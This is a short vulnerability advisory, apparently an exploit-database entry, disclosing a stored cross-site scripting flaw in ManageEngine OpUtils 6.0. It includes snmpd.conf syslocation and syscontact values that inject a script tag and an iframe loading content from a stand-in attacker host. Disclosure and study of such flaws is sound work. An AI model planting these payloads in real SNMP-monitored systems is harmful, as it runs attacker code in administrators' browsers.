ManageEngine OpUtils 6.0 - Stored XSS

🗓️ 01 Jul 2014 00:00:00Reported by RootType

ManageEngine OpUtils 6.0 - Stored XSS. Network troubleshooting tool with SNMP monitoring


                                                # Author: loneferret of Offensive Security
# Product: ManageEngine OpUtils
# Version: 6
# Vendor Site: http://www.manageengine.com
# Software Download: http://www.manageengine.com/products/oputils/download.html

# Software Description:
# http://www.manageengine.com/products/oputils/oputils.html
# The toolset can be used to troubleshoot the frequent network problems such as network 
# connectivity, availability, performance, health, and latency of any IP node in the network. 
# It provides desktop details like CPU, Disk space information, installed software, 
# process information and other vital metrics. Readymade tools to manage DNS names, 
# IP and MAC addresses are also available. SNMP tools are included to help monitor 
# any SNMP-enabled IP node. Graphs, charts, and tables offer real-time views of 
# the network and system information. Results can be exported as reports in various 
# formats like PDF and HTML.

# Vulnerability:
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file
# ..
# syslocation &#60;script src=&#34;http://attacker/xss.js&#34;&#62;&#60;/script&#62;
# syscontact &#60;iframe src=&#34;http://attacker/something.html&#34;&#62;&#60;/iframe&#62;

# 
# Adding the target machine either via a network scan or manually by adding the IP to the host list 
# ManageEngine monitors. When a SNMP Scan is initiated, we are presented with a couple of 
# nice alert boxes.
#

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1